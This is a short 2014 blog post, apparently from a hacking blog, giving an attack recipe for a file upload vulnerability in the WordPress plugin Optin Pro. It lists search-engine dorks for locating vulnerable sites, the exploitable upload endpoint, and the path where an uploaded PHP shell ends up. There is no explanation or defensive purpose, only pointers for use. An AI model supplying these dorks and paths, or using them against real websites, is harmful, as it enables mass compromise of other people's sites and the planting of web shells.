Monday, 12 May 2014

Exploit WordPress: Optin Pro - File Upload Vulnerability



Once again, i'm not gonna explain anything about this exploit since it is exactly the same as my previous post. So, i'm just gonna give you the dork and exploit.

DORK: inurl:/wp-content/uploads/svp/headerimage/
             inurl:/wp-content/plugins/wp_optin_pro/

EXPLOIT:/wp-content/plugins/wp_optin_pro/media-upload.php

SHELL UPLOADED TO: /wp-content/uploads/svp/headerimage/random_id_filename.php


 


PLEASE REFER MY PREVIOUS POST IF YOU DON'T UNDERSTAND